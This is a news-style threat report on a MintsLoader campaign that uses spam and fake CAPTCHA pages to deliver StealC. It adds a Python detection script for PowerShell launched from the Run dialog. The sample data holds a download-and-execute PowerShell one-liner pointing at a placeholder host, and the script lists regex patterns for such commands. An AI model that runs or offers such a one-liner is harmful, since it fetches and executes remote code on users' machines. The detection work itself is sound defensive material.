Threat hunters have identified an ongoing cyber campaign using MintsLoader, a PowerShell-based malware loader, to deliver additional malware such as StealC and a legitimate tool, BOINC. The campaign, affecting sectors such as electricity, oil, gas, and legal services in the U.S. and Europe, begins with spam emails that lead users to malicious links. These links often use fake CAPTCHA prompts to entice victims into running harmful scripts, thereby executing MintsLoader, which in turn retrieves malicious payloads from remote servers.
MintsLoader is a PowerShell-based malware loader that has been seen delivered via spam emails containing a link to Kongtuke/ClickFix pages or a JScript file.
The campaign has targeted electricity, oil and gas, and the legal services sectors in the United States and Europe, per the company, which detected the activity in early January 2025.
These fake verification pages load a potential victim's Windows copy/paste buffer with a malicious PowerShell script. The page also gives detailed instructions asking potential victims to paste and execute the script in a Run window.
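As an added illustration that is not part of the original report, the following defender-side check flags process-creation records matching this paste-into-Run pattern: PowerShell launched by explorer.exe (the process that owns the Run dialog) with hidden-window, policy-bypass or download-and-execute arguments. Field names follow Sysmon Event ID 1 conventions and the sample records are constructed, not real campaign telemetry.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style fields).
# Paths and command lines are illustrative, not indicators from the campaign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -ep bypass -c \"iex (iwr 'http://example.invalid/x')\""},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File C:\\scripts\\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

# Command-line traits typical of a one-liner pasted into the Run dialog:
# hidden window, execution-policy bypass, inline download-and-execute.
SUSPICIOUS_ARGS = [
    r"-w(indowstyle)?\s+hidden",
    r"-e(p|x|xec|xecutionpolicy)?\s+bypass",
    r"\biex\b|invoke-expression",
    r"\biwr\b|invoke-webrequest|downloadstring|downloadfile",
    r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}",
]

def is_clickfix_like(event):
    """True when PowerShell is started directly by the Windows shell
    (explorer.exe) with at least two of the suspicious argument traits."""
    parent = event["ParentImage"].lower()
    image = event["Image"].lower()
    cmd = event["CommandLine"].lower()
    if not parent.endswith("explorer.exe"):
        return False
    if not (image.endswith("powershell.exe") or image.endswith("pwsh.exe")):
        return False
    hits = [p for p in SUSPICIOUS_ARGS if re.search(p, cmd)]
    return len(hits) >= 2

def find_suspicious(events):
    """Return the subset of records worth an analyst's attention."""
    return [e for e in events if is_clickfix_like(e)]

if __name__ == "__main__":
    for e in find_suspicious(SAMPLE_EVENTS):
        print("ALERT:", e["CommandLine"])
```

Requiring two traits rather than one keeps ordinary administrative PowerShell (a scheduled script, a console session) out of the alert queue while still catching the hidden-window, download-and-run shape of the pasted script.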
The attack chain documented by eSentire starts when users click on a link in a spam email, leading to the download of an obfuscated JavaScript file.